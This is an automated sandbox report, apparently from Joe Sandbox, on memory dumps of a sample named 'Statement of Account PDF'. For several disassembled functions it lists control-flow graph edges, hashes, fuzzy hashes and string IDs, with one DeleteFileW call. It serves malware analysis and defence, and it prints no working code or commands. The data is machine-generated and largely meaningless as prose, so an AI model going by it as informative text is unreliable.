695811c-6958212 call 6956578 1906->1920 1907->1893 1907->1894 1911 6958314-6958317 1908->1911 1912 6958323-695835c 1908->1912 1911->1890 1912->1873 1930 6958362-695836c 1912->1930 1928 6957ff0-6957ff5 1915->1928 1929 6957ecb-6957ef3 1915->1929 1916->1875 1916->1896 1977 6958214-695821e 1920->1977 1978 6958220 1920->1978 1928->1916 1929->1928 1936 6957ef9-6957f27 1929->1936 1936->1928 1942 6957f2d-6957f36 1936->1942 1942->1928 1943 6957f3c-6957f6e 1942->1943 1950 6957f70-6957f74 1943->1950 1951 6957f79-6957f95 1943->1951 1950->1928 1953 6957f76 1950->1953 1951->1916 1954 6957f97-6957fee call 6956578 1951->1954 1953->1951 1954->1916 1979 6958225-6958227 1977->1979 1978->1979 1979->1907 1980 6958229-695822e 1979->1980 1981 6958230-695823a 1980->1981 1982 695823c 1980->1982 1983 6958241-6958243 1981->1983 1982->1983 1983->1907 1984 6958245-6958251 1983->1984 1984->1907
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q
                                                        • API String ID: 0-355816377
                                                        • Opcode ID: ca790eacdb5e0ddde326d621d8b06d5c5910ab6a53930da66575e78808c4a1fb
                                                        • Instruction ID: d3cd7c24f973b59c8cbef2cf7c897f642c2d5f294a18a74beebc32882ec9170f
                                                        • Opcode Fuzzy Hash: ca790eacdb5e0ddde326d621d8b06d5c5910ab6a53930da66575e78808c4a1fb
                                                        • Instruction Fuzzy Hash: D9029D30B002198FDB54DB64D594AAEB7F6FF84304F218929D809DB795DB31ED86CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06955568 Relevance: 1.8, Strings: 1, Instructions: 593COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2320 6955568-6955585 2321 6955587-695558a 2320->2321 2322 695558c-6955593 2321->2322 2323 6955598-695559b 2321->2323 2322->2323 2324 695559d-69555a3 2323->2324 2325 69555ae-69555b1 2323->2325 2326 69556c4-69556d2 2324->2326 2327 69555a9 2324->2327 2328 69555b3-69555b4 2325->2328 2329 69555b9-69555bc 2325->2329 2334 69556d9-69556dc 2326->2334 2327->2325 2328->2329 2330 69555cd-69555d0 2329->2330 2331 69555be-69555c2 2329->2331 2335 6955605-6955608 2330->2335 2336 69555d2-69555d5 2330->2336 2332 6955734-6955740 2331->2332 2333 69555c8 2331->2333 2333->2330 2341 69556e1-69556e4 2334->2341 2339 695560f-6955612 2335->2339 2340 695560a-695560c 2335->2340 2337 6955741-695576b 2336->2337 2338 69555db-69555e6 2336->2338 2357 6955775-6955778 2337->2357 2338->2337 2344 69555ec-69555f6 2338->2344 2339->2324 2345 6955614-6955617 2339->2345 2340->2339 2342 69556e6-69556f6 2341->2342 2343 69556fb-69556fe 2341->2343 2342->2343 2347 6955700-695571d 2343->2347 2348 6955722-6955724 2343->2348 2344->2337 2346 69555fc-6955600 2344->2346 2349 695562e-6955631 2345->2349 2350 6955619-6955629 2345->2350 2346->2335 2347->2348 2353 6955726 2348->2353 2354 695572b-695572e 2348->2354 2355 6955633-6955636 2349->2355 2356 695563b-695563e 2349->2356 2350->2349 2353->2354 2354->2321 2354->2332 2355->2356 2360 6955640-6955646 2356->2360 2361 695564d-6955650 2356->2361 2363 695579a-695579d 2357->2363 2364 695577a-695577e 2357->2364 2360->2336 2365 6955648 2360->2365 2361->2360 2362 6955652-6955655 2361->2362 2366 6955657-695565a 2362->2366 2367 695565f-6955662 2362->2367 2370 695579f-69557a9 2363->2370 2371 69557ae-69557b1 2363->2371 2368 6955784-695578c 2364->2368 2369 6955866-69558a4 2364->2369 2365->2361 2366->2367 2373 6955664-695566a 2367->2373 2374 6955671-6955674 2367->2374 2368->2369 2375 6955792-6955795 2368->2375 2388 69558a6-69558a9 2369->2388 2370->2371 2376 69557d3-69557d6 2371->2376 2377 69557b3-69557b7 2371->2377 2373->2366 2378 695566c 2373->2378 2380 6955676-695568c 2374->2380 2381 6955691-6955694 2374->2381 2375->2363 2384 69557f4-69557f7 2376->2384 2385 69557d8-69557dc 2376->2385 2377->2369 2383 69557bd-69557c5 2377->2383 2378->2374 2380->2381 2389 6955696-695569f 2381->2389 2390 69556a0-69556a3 2381->2390 2383->2369 2391 69557cb-69557ce 2383->2391 2386 6955807-695580a 2384->2386 2387 69557f9-6955800 2384->2387 2385->2369 2392 69557e2-69557ea 2385->2392 2396 6955814-6955817 2386->2396 2397 695580c-6955813 2386->2397 2394 6955802 2387->2394 2395 695585e-6955865 2387->2395 2398 69558c7-69558ca 2388->2398 2399 69558ab-69558bc 2388->2399 2401 69556a5-69556ba 2390->2401 2402 69556bf-69556c2 2390->2402 2391->2376 2392->2369 2393 69557ec-69557ef 2392->2393 2393->2384 2394->2386 2403 695582f-6955832 2396->2403 2404 6955819-695582a 2396->2404 2405 69558d0-6955a64 2398->2405 2406 6955bb3-6955bb6 2398->2406 2414 6955bc5-6955bcc 2399->2414 2415 69558c2 2399->2415 2401->2402 2402->2326 2402->2341 2411 6955834-6955838 2403->2411 2412 695584c-695584e 2403->2412 2404->2403 2469 6955b9d-6955bb0 2405->2469 2470 6955a6a-6955a71 2405->2470 2408 6955bc0-6955bc3 2406->2408 2409 6955bb8-6955bbd 2406->2409 2408->2414 2416 6955bd1-6955bd4 2408->2416 2409->2408 2411->2369 2417 695583a-6955842 2411->2417 2419 6955855-6955858 2412->2419 2420 6955850 2412->2420 2414->2416 2415->2398 2421 6955bd6-6955be9 2416->2421 2422 6955bec-6955bef 2416->2422 2417->2369 2423 6955844-6955847 2417->2423 2419->2357 2419->2395 2420->2419 2424 6955bf1-6955c02 2422->2424 2425 6955c09-6955c0c 2422->2425 2423->2412 2432 6955c04 2424->2432 2433 6955c3d-6955c4e 2424->2433 2425->2405 2427 6955c12-6955c15 2425->2427 2427->2405 2431 6955c1b-6955c1e 2427->2431 2434 6955c20-6955c31 2431->2434 2435 6955c38-6955c3b 2431->2435 2432->2425 2433->2414 2446 6955c54 2433->2446 2434->2421 2445 6955c33 2434->2445 2435->2433 2437 6955c59-6955c5c 2435->2437 2438 6955c5e-6955c65 2437->2438 2439 6955c6a-6955c6d 2437->2439 2438->2439 2442 6955c6f-6955c80 2439->2442 2443 6955c8b-6955c8d 2439->2443 2442->2414 2452 6955c86 2442->2452 2447 6955c94-6955c97 2443->2447 2448 6955c8f 2443->2448 2445->2435 2446->2437 2447->2388 2451 6955c9d-6955ca6 2447->2451 2448->2447 2452->2443 2471 6955b25-6955b2c 2470->2471 2472 6955a77-6955aaa 2470->2472 2471->2469 2473 6955b2e-6955b61 2471->2473 2482 6955aac 2472->2482 2483 6955aaf-6955af0 2472->2483 2485 6955b66-6955b93 2473->2485 2486 6955b63 2473->2486 2482->2483 2494 6955af2-6955b03 2483->2494 2495 6955b08-6955b0f 2483->2495 2485->2451 2486->2485 2494->2451 2496 6955b17-6955b19 2495->2496 2496->2451
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $
                                                        • API String ID: 0-3993045852
                                                        • Opcode ID: ebe7870b9e5fbfccdaa6538800bbe413c1ed14865491494c1849015338eee354
                                                        • Instruction ID: e5b43b1277ee6b06286fa03a6f96c7d49f31f721ea8d22cf3e79f2e8ca8c28bb
                                                        • Opcode Fuzzy Hash: ebe7870b9e5fbfccdaa6538800bbe413c1ed14865491494c1849015338eee354
                                                        • Instruction Fuzzy Hash: B122E135E002198FDF64DFA4C5846AEB7B6EF84310F228469D809EB786DB35DD42CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 069565C8 Relevance: .8, Instructions: 814COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe4aae2cef25beac88411af971d85e278c81e243e0abe4365944e57a38c3aa64
                                                        • Instruction ID: 1712fd17949bafad151a0d3e1b102940a09886d1de70a9c146fb7a7aae8cdf0e
                                                        • Opcode Fuzzy Hash: fe4aae2cef25beac88411af971d85e278c81e243e0abe4365944e57a38c3aa64
                                                        • Instruction Fuzzy Hash: ED62C134B002088FDF54DB68D594AADB7F6EF84314F658829E805EB764DB35ED86CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695C138 Relevance: .6, Instructions: 636COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e9df7d2c366d3df30d15c16b54450496768a007e1fad257f70226fd1f254133e
                                                        • Instruction ID: 3bfa469ba0165ccb996e249019e509312f51b9ff2d0c14fe748c270250fa7b6a
                                                        • Opcode Fuzzy Hash: e9df7d2c366d3df30d15c16b54450496768a007e1fad257f70226fd1f254133e
                                                        • Instruction Fuzzy Hash: 5E328034B10209DFDF54DB68D990AAEB7B6FB88314F218529E805EB754DB34EC42CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695AC90 Relevance: 10.4, Strings: 8, Instructions: 389COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 695ac90-695acae 1 695acb0-695acb3 0->1 2 695acb5-695acd1 1->2 3 695acd6-695acd9 1->3 2->3 4 695ace3-695ace6 3->4 5 695acdb-695ace0 3->5 7 695acf7-695acfa 4->7 8 695ace8-695acec 4->8 5->4 11 695acfc-695ad05 7->11 12 695ad0a-695ad0d 7->12 9 695acf2 8->9 10 695aebc-695aec6 8->10 9->7 11->12 14 695ad21-695ad24 12->14 15 695ad0f-695ad1c 12->15 16 695ad26-695ad2f 14->16 17 695ad3e-695ad41 14->17 15->14 18 695ad35-695ad39 16->18 19 695aec7-695aefe 16->19 20 695ad47-695ad4a 17->20 21 695aead-695aeb6 17->21 18->17 28 695af00-695af03 19->28 23 695ad64-695ad66 20->23 24 695ad4c-695ad5f 20->24 21->10 21->16 26 695ad6d-695ad70 23->26 27 695ad68 23->27 24->23 26->1 30 695ad76-695ad9a 26->30 27->26 31 695af05-695af09 28->31 32 695af10-695af13 28->32 48 695ada0-695adaf 30->48 49 695aeaa 30->49 33 695af61-695af9c 31->33 34 695af0b 31->34 35 695af15-695af31 32->35 36 695af36-695af39 32->36 46 695afa2-695afae 33->46 47 695b18f-695b1a2 33->47 34->32 35->36 38 695af46-695af49 36->38 39 695af3b-695af45 36->39 43 695af58-695af5b 38->43 44 695af4b 38->44 43->33 45 695b1c4-695b1c6 43->45 124 695af4b call 695b1f8 44->124 125 695af4b call 695b1e8 44->125 51 695b1cd-695b1d0 45->51 52 695b1c8 45->52 61 695afb0-695afc9 46->61 62 695afce-695b012 46->62 53 695b1a4 47->53 58 695adc7-695ae02 call 6956578 48->58 59 695adb1-695adb7 48->59 49->21 50 695af51-695af53 50->43 51->28 56 695b1d6-695b1e0 51->56 52->51 60 695b1a5 53->60 76 695ae04-695ae0a 58->76 77 695ae1a-695ae31 58->77 63 695adb9 59->63 64 695adbb-695adbd 59->64 60->60 61->53 78 695b014-695b026 62->78 79 695b02e-695b06d 62->79 63->58 64->58 80 695ae0c 76->80 81 695ae0e-695ae10 76->81 91 695ae33-695ae39 77->91 92 695ae49-695ae5a 77->92 78->79 85 695b154-695b169 79->85 86 695b073-695b14e call 6956578 79->86 80->77 81->77 85->47 86->85 94 695ae3d-695ae3f 91->94 95 695ae3b 91->95 98 695ae72-695aea3 92->98 99 695ae5c-695ae62 92->99 94->92 95->92 98->49 100 695ae64 99->100 101 695ae66-695ae68 99->101 100->98 101->98 124->50 125->50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-3823777903
                                                        • Opcode ID: 19a687485baf88fea4baf7d152b640d9eab0c7fd0d641a011d2813e21ae59cf6
                                                        • Instruction ID: 728e5915f3195fe03bd6fb04befb00a0b2495c42209a7e8c3f424e2fa85b03e5
                                                        • Opcode Fuzzy Hash: 19a687485baf88fea4baf7d152b640d9eab0c7fd0d641a011d2813e21ae59cf6
                                                        • Instruction Fuzzy Hash: 4DE17030E1020A8FDF65DF64D5946AEB7B6FF84304F218A29E8059B758DB34EC46CB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06959118 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 861 6959118-695913d 862 695913f-6959142 861->862 863 6959144-6959163 862->863 864 6959168-695916b 862->864 863->864 865 6959171-6959186 864->865 866 6959a2b-6959a2d 864->866 873 695919e-69591b4 865->873 874 6959188-695918e 865->874 868 6959a34-6959a37 866->868 869 6959a2f 866->869 868->862 871 6959a3d-6959a47 868->871 869->868 878 69591bf-69591c1 873->878 875 6959190 874->875 876 6959192-6959194 874->876 875->873 876->873 879 69591c3-69591c9 878->879 880 69591d9-695924a 878->880 881 69591cd-69591cf 879->881 882 69591cb 879->882 891 6959276-6959292 880->891 892 695924c-695926f 880->892 881->880 882->880 897 6959294-69592b7 891->897 898 69592be-69592d9 891->898 892->891 897->898 903 6959304-695931f 898->903 904 69592db-69592fd 898->904 909 6959321-6959343 903->909 910 695934a-6959354 903->910 904->903 909->910 911 6959364-69593de 910->911 912 6959356-695935f 910->912 918 69593e0-69593fe 911->918 919 695942b-6959440 911->919 912->871 923 6959400-695940f 918->923 924 695941a-6959429 918->924 919->866 923->924 924->918 924->919
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: d973a0eec89b09c939ee98dde12261856449cfcf04ee5cd7d65c9fe800a9f99e
                                                        • Instruction ID: 76e35bb303bb17525b84874cf5ab18e6812791a139bc1cf0a13deb4433b15ca0
                                                        • Opcode Fuzzy Hash: d973a0eec89b09c939ee98dde12261856449cfcf04ee5cd7d65c9fe800a9f99e
                                                        • Instruction Fuzzy Hash: 96913330F1021A9FDF54DF65D9507AEB3F6BFC8204F108565C809EB784EA70AD468B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695CF00 Relevance: 4.5, Strings: 3, Instructions: 799COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 927 695cf00-695cf1b 928 695cf1d-695cf20 927->928 929 695cf22-695cf64 928->929 930 695cf69-695cf6c 928->930 929->930 931 695cf76-695cf79 930->931 932 695cf6e-695cf73 930->932 933 695cf9c-695cf9f 931->933 934 695cf7b-695cf97 931->934 932->931 936 695cfa1-695cfa3 933->936 937 695cfae-695cfb1 933->937 934->933 939 695d2a7-695d2b0 936->939 940 695cfa9 936->940 941 695cfb3-695cff5 937->941 942 695cffa-695cffd 937->942 944 695d2b2-695d2b7 939->944 945 695d2bf-695d2cb 939->945 940->937 941->942 946 695d00c-695d00f 942->946 947 695cfff-695d001 942->947 944->945 954 695d2d1-695d2e5 945->954 955 695d3dc-695d3e1 945->955 951 695d011-695d053 946->951 952 695d058-695d05b 946->952 948 695d007 947->948 949 695d3e9 947->949 948->946 957 695d3ec-695d3f8 949->957 951->952 958 695d0a4-695d0a7 952->958 959 695d05d-695d09f 952->959 954->949 973 695d2eb-695d2fd 954->973 955->949 967 695d1e2-695d1f1 957->967 968 695d3fe-695d6eb 957->968 965 695d0f0-695d0f3 958->965 966 695d0a9-695d0b8 958->966 959->958 965->957 970 695d0f9-695d0fc 965->970 974 695d0c7-695d0d3 966->974 975 695d0ba-695d0bf 966->975 971 695d200-695d20c 967->971 972 695d1f3-695d1f8 967->972 1140 695d6f1-695d6f7 968->1140 1141 695d912-695d91c 968->1141 977 695d145-695d148 970->977 978 695d0fe-695d140 970->978 982 695d212-695d224 971->982 983 695d91d-695d956 971->983 972->971 998 695d321-695d323 973->998 999 695d2ff-695d305 973->999 974->983 984 695d0d9-695d0eb 974->984 975->974 987 695d191-695d194 977->987 988 695d14a-695d18c 977->988 978->977 1003 695d229-695d22c 982->1003 1002 695d958-695d95b 983->1002 984->965 995 695d196-695d1d8 987->995 996 695d1dd-695d1e0 987->996 988->987 995->996 996->967 996->1003 1004 695d32d-695d339 998->1004 1005 695d307 999->1005 1006 695d309-695d315 999->1006 1011 695d95d-695d979 1002->1011 1012 695d97e-695d981 1002->1012 1014 695d275-695d278 1003->1014 1015 695d22e-695d270 1003->1015 1027 695d347 1004->1027 1028 695d33b-695d345 1004->1028 1016 695d317-695d31f 1005->1016 1006->1016 1011->1012 1023 695d9b4-695d9b7 1012->1023 1024 695d983-695d9af 1012->1024 1020 695d295-695d297 1014->1020 1021 695d27a-695d290 1014->1021 1015->1014 1016->1004 1031 695d29e-695d2a1 1020->1031 1032 695d299 1020->1032 1021->1020 1036 695d9c6-695d9c8 1023->1036 1037 695d9b9 1023->1037 1024->1023 1041 695d34c-695d34e 1027->1041 1028->1041 1031->928 1031->939 1032->1031 1038 695d9cf-695d9d2 1036->1038 1039 695d9ca 1036->1039 1187 695d9b9 call 695da75 1037->1187 1188 695d9b9 call 695da88 1037->1188 1038->1002 1046 695d9d4-695d9e3 1038->1046 1039->1038 1041->949 1047 695d354-695d370 call 6956578 1041->1047 1044 695d9bf-695d9c1 1044->1036 1060 695d9e5-695da48 call 6956578 1046->1060 1061 695da4a-695da5f 1046->1061 1070 695d372-695d377 1047->1070 1071 695d37f-695d38b 1047->1071 1060->1061 1076 695da60 1061->1076 1070->1071 1071->955 1075 695d38d-695d3da 1071->1075 1075->949 1076->1076 1142 695d706-695d70f 1140->1142 1143 695d6f9-695d6fe 1140->1143 1142->983 1144 695d715-695d728 1142->1144 1143->1142 1146 695d902-695d90c 1144->1146 1147 695d72e-695d734 1144->1147 1146->1140 1146->1141 1148 695d736-695d73b 1147->1148 1149 695d743-695d74c 1147->1149 1148->1149 1149->983 1150 695d752-695d773 1149->1150 1153 695d775-695d77a 1150->1153 1154 695d782-695d78b 1150->1154 1153->1154 1154->983 1155 695d791-695d7ae 1154->1155 1155->1146 1158 695d7b4-695d7ba 1155->1158 1158->983 1159 695d7c0-695d7d9 1158->1159 1161 695d8f5-695d8fc 1159->1161 1162 695d7df-695d806 1159->1162 1161->1146 1161->1158 1162->983 1165 695d80c-695d816 1162->1165 1165->983 1166 695d81c-695d833 1165->1166 1168 695d835-695d840 1166->1168 1169 695d842-695d85d 1166->1169 1168->1169 1169->1161 1174 695d863-695d87c call 6956578 1169->1174 1178 695d87e-695d883 1174->1178 1179 695d88b-695d894 1174->1179 1178->1179 1179->983 1180 695d89a-695d8ee 1179->1180 1180->1161 1187->1044 1188->1044
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q
                                                        • API String ID: 0-831282457
                                                        • Opcode ID: 1d7e344b2c225d2c0a6c3ee35ffce38d3eefe365f90f373d7470714c06411b4a
                                                        • Instruction ID: 98b79435e62a786ec1c59d9c041b35a668a624b5323724a360c07278d0ecb4f6
                                                        • Opcode Fuzzy Hash: 1d7e344b2c225d2c0a6c3ee35ffce38d3eefe365f90f373d7470714c06411b4a
                                                        • Instruction Fuzzy Hash: 53628430B0020A9FCB15EB68D5A0A5EB7F2FF84304F218929D4159F759DB71ED8ACB84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013007A8 Relevance: 4.1, Strings: 3, Instructions: 347COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1189 13007a8-13007cd 1190 1300922-1300946 1189->1190 1191 13007d3-13007d5 1189->1191 1193 130094d-1300971 1190->1193 1192 13007db-13007e4 1191->1192 1191->1193 1195 13007e6-13007f4 1192->1195 1196 13007f7-130081e 1192->1196 1216 1300973-130099c 1193->1216 1195->1196 1198 1300824-1300837 call 13004a4 1196->1198 1199 13008a8-13008ac 1196->1199 1198->1199 1217 1300839-130088c 1198->1217 1201 13008e3-13008fc 1199->1201 1202 13008ae-13008db call 13004b4 1199->1202 1210 1300906-1300907 1201->1210 1211 13008fe 1201->1211 1220 13008e0 1202->1220 1210->1190 1211->1210 1226 130099e-13009d2 1216->1226 1217->1199 1222 130088e-13008a1 1217->1222 1220->1201 1222->1199 1229 1300a93 1226->1229 1230 13009d8-13009eb 1226->1230 1231 1300a98-1300aa3 1229->1231 1230->1229 1235 13009f1-13009fd 1230->1235 1236 1300aaa-1300ad3 1231->1236 1235->1231 1238 1300a03-1300a2e 1235->1238 1240 1300ad5-1300ade 1236->1240 1241 1300adf-1300bb4 1236->1241 1238->1229 1249 1300a30-1300a3c 1238->1249 1262 1300bba-1300bc8 1241->1262 1250 1300a88-1300a92 1249->1250 1251 1300a3e-1300a41 1249->1251 1253 1300a44-1300a4d 1251->1253 1253->1236 1255 1300a4f-1300a6a 1253->1255 1256 1300a72-1300a75 1255->1256 1257 1300a6c-1300a6e 1255->1257 1256->1229 1260 1300a77-1300a86 1256->1260 1257->1229 1259 1300a70 1257->1259 1259->1260 1260->1250 1260->1253 1263 1300bd1-1300c09 1262->1263 1264 1300bca-1300bd0 1262->1264 1268 1300c19 1263->1268 1269 1300c0b-1300c0f 1263->1269 1264->1263 1271 1300c1a 1268->1271 1269->1268 1270 1300c11 1269->1270 1270->1268 1271->1271
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq$(bq$(bq
                                                        • API String ID: 0-2716923250
                                                        • Opcode ID: 9f80f65ae2b7a6ffc564207080d5d5e01b8ea10f598138a5bcbd08c6b99b544b
                                                        • Instruction ID: a3e9818c41687095141bb9e35416036bc5521ac109275f97c90f17b048112dbf
                                                        • Opcode Fuzzy Hash: 9f80f65ae2b7a6ffc564207080d5d5e01b8ea10f598138a5bcbd08c6b99b544b
                                                        • Instruction Fuzzy Hash: 69D1AC30E002098FDB19DFB9C86469EBBF2FF89354F148569E445AB391DB34AD81CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06954B38 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1272 6954b38-6954b5c 1273 6954b5e-6954b61 1272->1273 1274 6954b67-6954c5f 1273->1274 1275 6955240-6955243 1273->1275 1295 6954c65-6954cad 1274->1295 1296 6954ce2-6954ce9 1274->1296 1276 6955245-695525f 1275->1276 1277 6955264-6955266 1275->1277 1276->1277 1279 695526d-6955270 1277->1279 1280 6955268 1277->1280 1279->1273 1282 6955276-6955283 1279->1282 1280->1279 1317 6954cb2 call 69553f0 1295->1317 1318 6954cb2 call 69553e0 1295->1318 1297 6954d6d-6954d76 1296->1297 1298 6954cef-6954d5f 1296->1298 1297->1282 1315 6954d61 1298->1315 1316 6954d6a 1298->1316 1309 6954cb8-6954cd4 1312 6954cd6 1309->1312 1313 6954cdf 1309->1313 1312->1313 1313->1296 1315->1316 1316->1297 1317->1309 1318->1309
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: fcq$XPcq$\Ocq
                                                        • API String ID: 0-3575482020
                                                        • Opcode ID: 87ec04517d9cf0f6632f16417dac6fad96604083288a3ffc1feaee1e77f0d244
                                                        • Instruction ID: e50ba71309610c4bb2b5b670f972175095df425e06432ee3c8a38ba5f73b558c
                                                        • Opcode Fuzzy Hash: 87ec04517d9cf0f6632f16417dac6fad96604083288a3ffc1feaee1e77f0d244
                                                        • Instruction Fuzzy Hash: 52617030E002089FEF54DFA5C854BAEBAF6EF88700F20842AE509AB395DF755D459F91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06959108 Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2219 6959108-695913d 2220 695913f-6959142 2219->2220 2221 6959144-6959163 2220->2221 2222 6959168-695916b 2220->2222 2221->2222 2223 6959171-6959186 2222->2223 2224 6959a2b-6959a2d 2222->2224 2231 695919e-69591b4 2223->2231 2232 6959188-695918e 2223->2232 2226 6959a34-6959a37 2224->2226 2227 6959a2f 2224->2227 2226->2220 2229 6959a3d-6959a47 2226->2229 2227->2226 2236 69591bf-69591c1 2231->2236 2233 6959190 2232->2233 2234 6959192-6959194 2232->2234 2233->2231 2234->2231 2237 69591c3-69591c9 2236->2237 2238 69591d9-695924a 2236->2238 2239 69591cd-69591cf 2237->2239 2240 69591cb 2237->2240 2249 6959276-6959292 2238->2249 2250 695924c-695926f 2238->2250 2239->2238 2240->2238 2255 6959294-69592b7 2249->2255 2256 69592be-69592d9 2249->2256 2250->2249 2255->2256 2261 6959304-695931f 2256->2261 2262 69592db-69592fd 2256->2262 2267 6959321-6959343 2261->2267 2268 695934a-6959354 2261->2268 2262->2261 2267->2268 2269 6959364-69593de 2268->2269 2270 6959356-695935f 2268->2270 2276 69593e0-69593fe 2269->2276 2277 695942b-6959440 2269->2277 2270->2229 2281 6959400-695940f 2276->2281 2282 695941a-6959429 2276->2282 2277->2224 2281->2282 2282->2276 2282->2277
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q
                                                        • API String ID: 0-355816377
                                                        • Opcode ID: cc93dc6c6f5958c976d48a8cbd20d45d57f4e263e4bf3573e5d15a55bbb06420
                                                        • Instruction ID: 0f60c431f3e63cdb218a7f53354abfb20147c70a7982e123e99d175578e8fc39
                                                        • Opcode Fuzzy Hash: cc93dc6c6f5958c976d48a8cbd20d45d57f4e263e4bf3573e5d15a55bbb06420
                                                        • Instruction Fuzzy Hash: 23514470B101199FDF54EB65DA60B6E73FAEF88244F148469C909DB788DA30EC42CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01017800 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2498 1017800-10181ba 2501 10181c2-10181ed DeleteFileW 2498->2501 2502 10181bc-10181bf 2498->2502 2503 10181f6-101821e 2501->2503 2504 10181ef-10181f5 2501->2504 2502->2501 2504->2503
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 010181E0
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4073010284.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1010000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: de48f63dd1de2ec36bcb688b880b91511f3ec439a3b2a05e3f5d4a8a72dd7174
